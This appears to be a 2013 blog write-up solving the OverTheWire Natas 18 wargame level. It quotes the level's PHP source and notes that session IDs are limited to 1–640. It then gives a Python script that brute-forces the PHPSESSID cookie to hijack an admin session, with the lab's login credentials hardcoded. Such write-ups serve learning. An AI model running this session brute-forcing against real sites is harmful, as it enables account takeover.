DISCLAIMER: The information in this site is for educational purpose only. The authors of this blog are not responsible for any kind of misuse of this information.

Thursday, December 12, 2013

OverTheWire Natas 18

First, let's inspect the source code: we can see that our target is to own a session with 'admin' key set to 1 in order to receive the credentials for the next level. The problem is that there is no way to add fields to our session, except for the following commented-out function and its call: 
function isValidAdminLogin() { /* {{{ */

    if($_REQUEST["username"] == "admin") {

    /* This method of authentication appears to be unsafe and has been 

       disabled for now. */

        //return 1;
    }
    return 0;
}

...

$_SESSION["admin"] = isValidAdminLogin();
So instead of try manipulating our own session, let's try identifying with the admin session ! The session id is generated by the following function: 
function createID($user) { /* {{{ */     
 global $maxid;     
 return rand(1, $maxid); 
}
where 
$maxid = 640;
The function generates a random session id in {1,2,...,640} --> The session id space is small enough for brute-force attack to be feasible. 
import requests

for sessid in range(641):

    r = requests.get('http://natas18.natas.labs.overthewire.org?debug=1', 
        auth=('natas18', 'xvKIqDjy4OPv7wCRgDlmj0pFsCsDjhdP'), 
        cookies={'PHPSESSID':str(sessid)})

    if 'You are an admin' in r.content:
        print r.content # will print next level credentials.
        break
Solved :)

No comments :

Post a Comment

Subscribe to: Post Comments ( Atom )